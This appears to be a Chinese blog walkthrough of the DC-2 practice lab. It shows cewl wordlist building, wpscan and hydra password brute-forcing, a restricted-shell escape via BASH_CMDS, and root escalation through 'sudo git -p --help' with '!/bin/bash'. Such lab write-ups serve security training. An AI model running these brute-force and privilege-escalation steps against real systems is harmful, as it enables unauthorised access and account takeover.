DC-2 入门练习

*DC-2

1. 准备工作：

创建好DC-2靶机
查看网络配置以及MAC地址（为后面扫描找ip准备）![在这里插入图片描述](https://img-blog.csdnimg.cn/20200714153731621.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01yX2hlbGxvd29yZA==,size_16,color_FFFFFF,t_70)

2. 扫描内网找到靶机ip

3. 找到ip，信息收集（80端口，和ssh端口开放）

登录访问80端口发现flag1

4. 根据提示利用cewl制作一个密码字典

Cewl是一款采用Ruby开发的应用程序，你可以给它的爬虫指定URL地址和爬取深度，还可以添额外的外部链接，接下来Cewl会给你返回一个字典文件，你可以把字典用到类似John the Ripper这样的密码破解工具中。（简单来讲就是爬行网站，搜集相关信息制作字典）

cewl  cd-2 >pwd.dic

5. 利用美少妇（msfconsole）进行网站目录扫描（其他工具也可以）

use auxiliary/scanner/http/dir_scanner

set RHOSTS 192.168.1.10

set THREADS 50

exploit

5.wpscan爆破网站

wpscan --url dc-2 -U user.dic -P pwd1.dic
wpscan --url dc-2 -e u

扫描网站存在用户然后制作user.dic用户名字典

利用字典爆破出登录用户名密码

6. 登录后台找到flag2

7.hydra爆破ssh登录

根据flag2的提示，我们要找到其他方法拿到flag，这里想到ssh端口于是利用ssh远程爆破

hydra -L user.dic -P pwd.dic ssh://192.168.1.10 -s 7744 -o hydra.ssh -vV     //hydra暴力破解
ssh [email protected] -p 7744                                      //远程登录

sydra爆破成功后用tom用户远程登录，查看目录发现flag3，但是无法查看：

8. 绕过限制

（执行命令发现 command not found，这是因为ssh远程连接到服务器的环境变量中不包含对应可执行文件的路径需要自行添加 ）

BASH_CMDS[a]=/bin/sh;a

/bin/bash

export PATH=$PATH:/bin/

export PATH=$PATH:/usr/bin

如下：

根据flag3的提示，我们切换到jery用户，然后查看家目录，发现flag4但是无权访问这也意味着下一步需要提权

9. 提权

根据提示我们需要用到git命令，这里和dc-1提权类似，利用具有root权限的命令
1.查看具有root权限

sudo -l

2. git提权，强制进入交互式状态，让页面缓冲区无法显示全部信息

sudo git -p --help
!/bin/bash

成功找到flag

DC靶机系列入门详解，关注查看下一篇

参考资料：千锋网络安全教程
如有不足请指出